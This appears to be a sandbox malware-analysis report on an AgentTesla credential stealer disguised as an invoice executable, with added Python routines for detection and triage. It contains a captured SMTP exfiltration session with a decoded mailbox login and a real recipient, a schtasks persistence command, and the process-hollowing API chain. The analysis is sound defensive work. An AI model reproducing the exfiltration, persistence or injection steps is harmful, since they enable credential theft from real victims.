Aug 8, 2022 20:20:08.739322901 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:09.421390057 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:09.421747923 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:09.675313950 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:09.759871006 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:09.849378109 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:10.103190899 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:10.117631912 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:10.390836954 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:10.438348055 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:10.691970110 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:10.692256927 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:10.985178947 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:11.047105074 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:11.150580883 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:11.445415020 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:11.698849916 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:11.698982954 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:11.732976913 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:11.733160019 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:11.733853102 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:11.733959913 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57
Aug 8, 2022 20:20:11.986447096 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:11.987082005 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:11.989464998 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3
Aug 8, 2022 20:20:12.150705099 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 8, 2022 20:20:08.416261911 CEST | 63332 | 53 | 192.168.2.3 | 8.8.8.8
Aug 8, 2022 20:20:08.437103987 CEST | 53 | 63332 | 8.8.8.8 | 192.168.2.3

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 8, 2022 20:20:08.416261911 CEST | 192.168.2.3 | 8.8.8.8 | 0x1581 | Standard query (0) | mail.oceanskylogistics.in | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 8, 2022 20:20:08.437103987 CEST | 8.8.8.8 | 192.168.2.3 | 0x1581 | No error (0) | mail.oceanskylogistics.in | | 43.255.154.57 | A (IP address) | IN (0x0001)

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Aug 8, 2022 20:20:09.421390057 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3 | 220-sg2plcpnl0242.prod.sin2.secureserver.net ESMTP Exim 4.94.2 #2 Mon, 08 Aug 2022 11:20:09 -0700
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Aug 8, 2022 20:20:09.421747923 CEST | 49763 | 587 | 192.168.2.3 | 43.255.154.57 | EHLO 320946
Aug 8, 2022 20:20:09.675313950 CEST | 587 | 49763 | 43.255.154.57 | 192.168.2.3 | 250-sg2plcpnl0242.prod.sin2.secureserver.net Hello 320946 [102.129.143.3]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-CHUNKING
    250-STARTTLS
    250-SMTPUTF8
    250 HELP
                                                                                                                        Aug 8, 2022 20:20:09.849378109 CEST49763587192.168.2.343.255.154.57AUTH login aW1wb3J0QG9jZWFuc2t5bG9naXN0aWNzLmlu
                                                                                                                        Aug 8, 2022 20:20:10.103190899 CEST5874976343.255.154.57192.168.2.3334 UGFzc3dvcmQ6
                                                                                                                        Aug 8, 2022 20:20:10.390836954 CEST5874976343.255.154.57192.168.2.3235 Authentication succeeded
                                                                                                                        Aug 8, 2022 20:20:10.438348055 CEST49763587192.168.2.343.255.154.57MAIL FROM:<import@oceanskylogistics.in>
                                                                                                                        Aug 8, 2022 20:20:10.691970110 CEST5874976343.255.154.57192.168.2.3250 OK
                                                                                                                        Aug 8, 2022 20:20:10.692256927 CEST49763587192.168.2.343.255.154.57RCPT TO:<ajay@mbff.co.in>
                                                                                                                        Aug 8, 2022 20:20:11.047105074 CEST5874976343.255.154.57192.168.2.3250 Accepted
                                                                                                                        Aug 8, 2022 20:20:11.445415020 CEST49763587192.168.2.343.255.154.57DATA
                                                                                                                        Aug 8, 2022 20:20:11.698982954 CEST5874976343.255.154.57192.168.2.3354 Enter message, ending with "." on a line by itself
                                                                                                                        Aug 8, 2022 20:20:11.733959913 CEST49763587192.168.2.343.255.154.57.
                                                                                                                        Aug 8, 2022 20:20:11.989464998 CEST5874976343.255.154.57192.168.2.3250 OK id=1oL7MJ-00GBzl-Gn
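The SMTP exchange above, decoded and triaged, as an added example that is not Joe Sandbox output. The transcript is the conversation from the table (the server's EHLO capability lines trimmed to the ones that matter); the client's base64 password reply is absent from the capture, so only the username is recovered, although the parser handles that line when a capture includes it. The triage rules are this example's own, not the sandbox's signatures.

```python
"""Decode and triage the captured SMTP session (added example, not Joe Sandbox output)."""
import base64
import binascii
import re

# Transcript from the report above: "C" = client 192.168.2.3, "S" = server 43.255.154.57:587.
# EHLO capability lines trimmed; the client's password reply is not in the capture.
TRANSCRIPT = [
    ("S", "220-sg2plcpnl0242.prod.sin2.secureserver.net ESMTP Exim 4.94.2 #2 Mon, 08 Aug 2022 11:20:09 -0700"),
    ("C", "EHLO 320946"),
    ("S", "250-sg2plcpnl0242.prod.sin2.secureserver.net Hello 320946 [102.129.143.3]"),
    ("S", "250-STARTTLS"),
    ("C", "AUTH login aW1wb3J0QG9jZWFuc2t5bG9naXN0aWNzLmlu"),
    ("S", "334 UGFzc3dvcmQ6"),
    ("S", "235 Authentication succeeded"),
    ("C", "MAIL FROM:<import@oceanskylogistics.in>"),
    ("S", "250 OK"),
    ("C", "RCPT TO:<ajay@mbff.co.in>"),
    ("S", "250 Accepted"),
    ("C", "DATA"),
    ("S", '354 Enter message, ending with "." on a line by itself'),
    ("C", "."),
    ("S", "250 OK id=1oL7MJ-00GBzl-Gn"),
]
SMTP_VERBS = {"EHLO", "HELO", "AUTH", "MAIL", "RCPT", "DATA", "QUIT", "STARTTLS", "RSET", "NOOP"}
ANGLE = re.compile(r"<([^>]*)>")


def b64_text(token):
    """Decode a base64 SMTP AUTH token to text; None if it is not valid base64."""
    try:
        return base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def parse_smtp_session(lines):
    """Walk a (direction, line) transcript and collect the fields an analyst needs."""
    info = {"ehlo_name": None, "client_public_ip": None, "starttls_offered": False,
            "starttls_used": False, "auth_mechanism": None, "auth_user": None,
            "auth_password": None, "server_prompts": [], "auth_succeeded": False,
            "mail_from": None, "rcpt_to": [], "message_accepted": False, "queue_id": None}
    state = None  # None | "auth_password" | "data" | "data_end"
    for who, line in lines:
        if who == "S":
            code = line[:3]
            if code == "250" and "STARTTLS" in line.upper():
                info["starttls_offered"] = True
            elif code == "250" and info["client_public_ip"] is None and "[" in line:
                m = re.search(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]", line)  # "Hello <name> [ip]"
                info["client_public_ip"] = m.group(1) if m else None
            elif code == "334":  # base64 prompt, e.g. "Password:"
                info["server_prompts"].append(b64_text(line[4:]) or line[4:])
            elif code == "235":
                info["auth_succeeded"], state = True, None
            elif code == "250" and state == "data_end":
                m = re.search(r"\bid=(\S+)", line)
                info["message_accepted"], info["queue_id"] = True, (m.group(1) if m else None)
                state = None
            continue
        if state == "data":  # message body; a lone "." ends it
            state = "data_end" if line == "." else state
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if state == "auth_password" and verb not in SMTP_VERBS:
            info["auth_password"], state = b64_text(line), None
        elif verb in ("EHLO", "HELO"):
            info["ehlo_name"] = arg
        elif verb == "STARTTLS":
            info["starttls_used"] = True
        elif verb == "AUTH":
            mech, _, initial = arg.partition(" ")
            info["auth_mechanism"] = mech.upper()
            if mech.upper() == "LOGIN" and initial:
                info["auth_user"], state = b64_text(initial), "auth_password"
            elif mech.upper() == "PLAIN" and initial:  # authzid\0authcid\0password
                _, info["auth_user"], info["auth_password"] = ((b64_text(initial) or "") + "\0\0").split("\0")[:3]
        elif verb in ("MAIL", "RCPT"):
            m = ANGLE.search(arg)
            addr = m.group(1) if m else arg
            if verb == "MAIL":
                info["mail_from"] = addr
            else:
                info["rcpt_to"].append(addr)
        elif verb == "DATA":
            state = "data"
    return info


def triage(info):
    """Reasons this session reads as credential exfiltration rather than ordinary mail."""
    reasons = []
    if info["auth_mechanism"] in ("LOGIN", "PLAIN") and not info["starttls_used"]:
        reasons.append("AUTH %s without STARTTLS: credentials crossed the wire base64-encoded, not encrypted" % info["auth_mechanism"])
    if info["ehlo_name"] and re.fullmatch(r"\d+", info["ehlo_name"]):
        reasons.append("EHLO name is a bare number (%s), not a hostname" % info["ehlo_name"])
    if info["auth_succeeded"] and info["auth_user"] and info["rcpt_to"]:
        reasons.append("authenticated as %s, mail sent to %s" % (info["auth_user"], ", ".join(info["rcpt_to"])))
    if info["message_accepted"]:
        reasons.append("server accepted the message, queue id %s" % info["queue_id"])
    return reasons
```

`parse_smtp_session(TRANSCRIPT)` yields the mailbox the sample authenticated to (import@oceanskylogistics.in), the decoded 334 prompt ("Password:"), the recipient and the queue id; when the same session is replayed from a full pcap the password line decodes the same way, which is why port-587 sessions with AUTH LOGIN/PLAIN and no STARTTLS are worth alerting on regardless of the sender.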

                                                                                                                        Target ID:0
                                                                                                                        Start time:20:20:10
                                                                                                                        Start date:08/08/2022
                                                                                                                        Path:C:\Users\user\Desktop\INVOICE OUTSTANDING.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\INVOICE OUTSTANDING.exe"
                                                                                                                        Imagebase:0xa30000
                                                                                                                        File size:1031168 bytes
                                                                                                                        MD5 hash:0FA9D94D6393235F67A17B220902DBFA
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: Windows_Trojan_AgentTesla_e577e17e, Description: unknown, Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                        Reputation:low

                                                                                                                        Target ID:2
                                                                                                                        Start time:20:20:21
                                                                                                                        Start date:08/08/2022
                                                                                                                        Path:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                        Imagebase:0x7ff6c2f90000
                                                                                                                        File size:36864 bytes
                                                                                                                        MD5 hash:02BA81746B929ECC9DB6665589B68335
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:moderate

                                                                                                                        Target ID:12
                                                                                                                        Start time:20:20:38
                                                                                                                        Start date:08/08/2022
                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        Wow64 process (32bit):true
Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ahgeNfsrA" /XML "C:\Users\user\AppData\Local\Temp\tmp69D2.tmp"
                                                                                                                        Imagebase:0xe60000
                                                                                                                        File size:185856 bytes
                                                                                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Target ID:13
                                                                                                                        Start time:20:20:40
                                                                                                                        Start date:08/08/2022
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff7c9170000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Target ID:14
                                                                                                                        Start time:20:20:41
                                                                                                                        Start date:08/08/2022
                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:{path}
                                                                                                                        Imagebase:0xf30000
                                                                                                                        File size:45152 bytes
                                                                                                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: Windows_Trojan_AgentTesla_e577e17e, Description: unknown, Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        Target ID:18
                                                                                                                        Start time:20:21:02
                                                                                                                        Start date:08/08/2022
                                                                                                                        Path:C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\kECjS\kECjS.exe"
                                                                                                                        Imagebase:0x990000
                                                                                                                        File size:45152 bytes
                                                                                                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 0%, Metadefender, Browse
                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                        Reputation:high

                                                                                                                        Target ID:19
                                                                                                                        Start time:20:21:03
                                                                                                                        Start date:08/08/2022
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff7c9170000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Target ID:20
                                                                                                                        Start time:20:21:11
                                                                                                                        Start date:08/08/2022
                                                                                                                        Path:C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\kECjS\kECjS.exe"
                                                                                                                        Imagebase:0x510000
                                                                                                                        File size:45152 bytes
                                                                                                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                        Reputation:high

                                                                                                                        Target ID:21
                                                                                                                        Start time:20:21:11
                                                                                                                        Start date:08/08/2022
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff7c9170000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
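A triage routine for scheduled tasks of the kind the schtasks call above creates, as an added example that is not part of the Joe Sandbox report. Both task XML documents are constructed: the report does not show the contents of tmp69D2.tmp, and pointing the task's action at the dropped kECjS.exe is an assumption; the scoring weights and the user-writable-path list are this example's own. The XML namespace is the one exported Task Scheduler tasks actually use.

```python
"""Score exported Task Scheduler XML for persistence (added example, not part of the report)."""
import os
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Locations a standard user can write to; a task action living there is the main red flag.
USER_WRITABLE = re.compile(
    r"^(?:%(?:appdata|localappdata|temp|tmp|userprofile)%|[a-z]:\\users\\[^\\]+\\|[a-z]:\\programdata\\)",
    re.IGNORECASE)

# Constructed XML: the report does not include tmp69D2.tmp, so this is what a task written by
# the sample's schtasks call could look like; the action path is the dropped kECjS.exe from the
# process list (an assumption, not something the report shows).
SUSPICIOUS_TASK = (r"\Updates\ahgeNfsrA", r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Settings><Hidden>true</Hidden><StartWhenAvailable>true</StartWhenAvailable></Settings>
  <Actions Context="Author">
    <Exec><Command>"C:\Users\user\AppData\Roaming\kECjS\kECjS.exe"</Command></Exec>
  </Actions>
</Task>""")
# Constructed XML for contrast: a Microsoft-folder task running from %windir%.
BENIGN_TASK = (r"\Microsoft\Windows\Defrag\ScheduledDefrag", r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2022-01-01T01:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author">
    <Exec><Command>%windir%\system32\defrag.exe</Command><Arguments>-c -h -o -$</Arguments></Exec>
  </Actions>
</Task>""")


def triage_task(task_name, xml_text):
    """Return (score, findings). 3+ means the action itself is suspect; 1-2 is context only."""
    root = ET.fromstring(xml_text)
    findings = []
    for exec_node in root.findall(".//t:Actions/t:Exec", NS):
        cmd = (exec_node.findtext("t:Command", default="", namespaces=NS) or "").strip().strip('"')
        if USER_WRITABLE.match(cmd):
            findings.append((3, "action runs from a user-writable path: " + cmd))
    if root.find(".//t:Triggers/t:LogonTrigger", NS) is not None:
        findings.append((1, "runs at logon"))
    hidden = root.findtext(".//t:Settings/t:Hidden", default="false", namespaces=NS) or ""
    if hidden.strip().lower() == "true":
        findings.append((1, "task is hidden from the Task Scheduler UI"))
    if not task_name.lower().startswith("\\microsoft\\"):
        findings.append((1, "task lives outside the \\Microsoft\\ folder: " + task_name))
    return sum(weight for weight, _ in findings), [text for _, text in findings]


def triage_tasks_dir(tasks_root):
    """Walk a copy of C:\\Windows\\System32\\Tasks; the task name is the path below the root."""
    results = []
    for dirpath, _, files in os.walk(tasks_root):
        for name in files:
            path = os.path.join(dirpath, name)
            task_name = "\\" + os.path.relpath(path, tasks_root).replace("/", "\\")
            with open(path, "rb") as fh:
                raw = fh.read()  # bytes, so ET honours the UTF-16 declaration the real files carry
            try:
                results.append((task_name,) + triage_task(task_name, raw))
            except ET.ParseError:
                continue
    return sorted(results, key=lambda r: -r[1])
```

The path check is the one that matters: a task whose action lives under a user profile, %TEMP% or ProgramData is rarely legitimate, and a logon trigger plus the hidden flag only raise the priority. Run `triage_tasks_dir` against the Tasks directory collected from a suspect host (or an offline image) and read the top of the list first.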

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:10.8%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:2%
                                                                                                                          Total number of Nodes:147
                                                                                                                          Total number of Limit Nodes:8
execution_graph (147 nodes; the rendered graph does not survive as text). API-call nodes present in the graph, by address:
  0x83216e7, 0x8321660  CreateProcessW
  0x8321b07, 0x8321ae3  ReadProcessMemory
  0x8321b67, 0x8321bab  VirtualAllocEx
  0x8321c5b, 0x8321c0c  WriteProcessMemory
  0x8321a20             SetThreadContext
  0x8321e09             ResumeThread
  0x83226c0, 0x83226bb  PostMessageW
  0x78bbf30             VirtualProtect
  0x14bc0a0             DuplicateHandle
  0x14b99b0             GetModuleHandleW
  0x14b9bf0             LoadLibraryExW
  0x14bba70, 0x14bbb27  GetCurrentProcess
  0x14bbaea             GetCurrentThread
  0x14bbb85             GetCurrentThreadId
The CreateProcessW, ReadProcessMemory, VirtualAllocEx, WriteProcessMemory, SetThreadContext and ResumeThread nodes in the 0x832xxxx region are the call set of a process-hollowing (RunPE) injector, which lines up with the AgentTesla YARA matches inside the RegSvcs.exe image (Target ID 14, 0x402000). The GetModuleHandleW and LoadLibraryExW nodes in the 0x14bxxxx region are the dynamic API resolution that precedes it.
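A detector that turns an API trace like the one behind the execution graph into a process-hollowing finding, as an added example that is not Joe Sandbox code. The graph names the API nodes but gives neither call order nor arguments, so the two traces here are constructed: handle values, flags and addresses are assumptions, arranged as a CREATE_SUSPENDED hollowing run with unrelated calls interleaved, plus a debugger-style suspended start that must not fire. It also accepts the Nt* names that some tracers log in place of the Win32 wrappers, which goes beyond what the graph shows.

```python
"""Correlate a sandbox API trace into a process-hollowing chain (added example, not Joe Sandbox code)."""
CREATE_SUSPENDED = 0x4
PAGE_EXECUTE_READWRITE = 0x40
# Native calls a trace may log in place of the Win32 wrappers named in the graph.
ALIASES = {"NtAllocateVirtualMemory": "VirtualAllocEx", "NtWriteVirtualMemory": "WriteProcessMemory",
           "NtSetContextThread": "SetThreadContext", "NtResumeThread": "ResumeThread"}
CHAIN = ["VirtualAllocEx", "WriteProcessMemory", "SetThreadContext", "ResumeThread"]


def call(api, ret=1, **args):
    """One trace event: API name, its arguments, and its return/out values."""
    return {"api": api, "args": args, "ret": ret}


# Constructed trace (not from the report): the graph's API set in the order a CREATE_SUSPENDED
# hollowing run uses them, with unrelated calls interleaved. Handles, flags and addresses are assumptions.
HOLLOWING_TRACE = [
    call("GetModuleHandleW", lpModuleName="kernel32.dll", ret=0x77000000),
    call("CreateProcessW", lpApplicationName=r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
         dwCreationFlags=CREATE_SUSPENDED, ret={"hProcess": 0x2A8, "hThread": 0x2AC}),
    call("ReadProcessMemory", hProcess=0x2A8, lpBaseAddress=0x7FFDE008),      # read child's image base
    call("VirtualAllocEx", hProcess=0x2A8, lpAddress=0x400000, dwSize=0x10000,
         flProtect=PAGE_EXECUTE_READWRITE, ret=0x400000),
    call("PostMessageW", hWnd=0, Msg=0x111),                                  # unrelated noise
    call("WriteProcessMemory", hProcess=0x2A8, lpBaseAddress=0x400000),       # PE headers
    call("NtWriteVirtualMemory", hProcess=0x2A8, lpBaseAddress=0x402000),     # sections, via Nt alias
    call("SetThreadContext", hThread=0x2AC),                                  # entry point swap
    call("ResumeThread", hThread=0x2AC),
]
# Constructed: a debugger-style suspended start with no injection; must not fire.
SUSPENDED_ONLY_TRACE = [
    call("CreateProcessW", lpApplicationName=r"C:\Windows\System32\notepad.exe",
         dwCreationFlags=CREATE_SUSPENDED, ret={"hProcess": 0x300, "hThread": 0x304}),
    call("GetThreadContext", hThread=0x304),
    call("ResumeThread", hThread=0x304),
]


def find_hollowing(trace):
    """Return one finding per suspended child whose own handles see CHAIN, in order."""
    findings = []
    for i, ev in enumerate(trace):
        if ev["api"] != "CreateProcessW" or not ev["args"].get("dwCreationFlags", 0) & CREATE_SUSPENDED:
            continue
        hproc, hthread = ev["ret"]["hProcess"], ev["ret"]["hThread"]
        first_seen, writes, rwx_alloc = {}, 0, False
        for j in range(i + 1, len(trace)):
            api = ALIASES.get(trace[j]["api"], trace[j]["api"])
            args = trace[j]["args"]
            if args.get("hProcess") != hproc and args.get("hThread") != hthread:
                continue  # no handle, or a different target: not part of this chain
            first_seen.setdefault(api, j)
            if api == "WriteProcessMemory":
                writes += 1
            if api == "VirtualAllocEx" and args.get("flProtect", 0) & PAGE_EXECUTE_READWRITE:
                rwx_alloc = True
        positions = [first_seen.get(step) for step in CHAIN]
        if None in positions or positions != sorted(positions):
            continue  # a step is missing or out of order (e.g. a debugger resuming without writes)
        findings.append({"target": ev["args"].get("lpApplicationName"), "hProcess": hproc,
                         "write_count": writes, "rwx_alloc": rwx_alloc, "chain_span": (i, positions[-1])})
    return findings
```

Keying every step to the handles CreateProcessW returned is what keeps the rule quiet on installers and debuggers that also start children suspended: they resume without the allocate-write-set-context sequence on that process, so the chain never completes.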
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: D0k$Xck$Xck
                                                                                                                          • API String ID: 0-1795155639
                                                                                                                          • Opcode ID: ebba89c9b62f880935ef1b658df012dc044a88761eb5061926322429492ac22d
                                                                                                                          • Instruction ID: 85ce663823a3fde4bbae2bb80d4b4474e4f40783417561b91acaed122c5dfc87
                                                                                                                          • Opcode Fuzzy Hash: ebba89c9b62f880935ef1b658df012dc044a88761eb5061926322429492ac22d
                                                                                                                          • Instruction Fuzzy Hash: 3132C2B1B042198FCB34DF69C8506AEBBB6EF95204F19C0A9D409DB761DB31DC46CB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph
(Control-flow graph for basic blocks 83220b9-832237a; the rendered graph and its Executed/Not Executed colouring are not preserved in this export. The graph dump contains no API-call nodes.)
Strings
Memory Dump Source
• Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID:
• String ID: ./e$M]7e$Zz4:
• API String ID: 0-869570009
• Opcode ID: 8dc5fb4b572ff1c2312f50726e8a86e6e4f77b37e15b273d2677848949e220c0
• Instruction ID: 6b22090424faaac6b5e3dc68c3822b73f7036c57005ae799fd8d0daefbaf201b
• Opcode Fuzzy Hash: 8dc5fb4b572ff1c2312f50726e8a86e6e4f77b37e15b273d2677848949e220c0
• Instruction Fuzzy Hash: 8B818D70E19218DFCB14CFA9D88499EFFB6EF89311F24A82AD516BB254D734A542CF04
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
(Control-flow graph for basic blocks 78b62b5-78b6815; the rendered graph and its Executed/Not Executed colouring are not preserved in this export. Block 78b6412 makes two internal calls, to 78b69c9 and 78b69d8; the graph dump contains no API-call nodes.)
Strings
Memory Dump Source
• Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID:
• String ID: `q~'
• API String ID: 0-1541917547
• Opcode ID: 136dafb88db706618da9ae1393cd2cddb8b3f247bb6c22e2796c34278d01b207
• Instruction ID: f91a79b3ea4c69c5e7a8e5b3c4057d73b15cc9780bfd338ba503b828963ce66a
• Opcode Fuzzy Hash: 136dafb88db706618da9ae1393cd2cddb8b3f247bb6c22e2796c34278d01b207
• Instruction Fuzzy Hash: 790238B0A1520ADFCB14CF99D4818AEFBF2FF59310B24946AD506EB314E734A952CF90
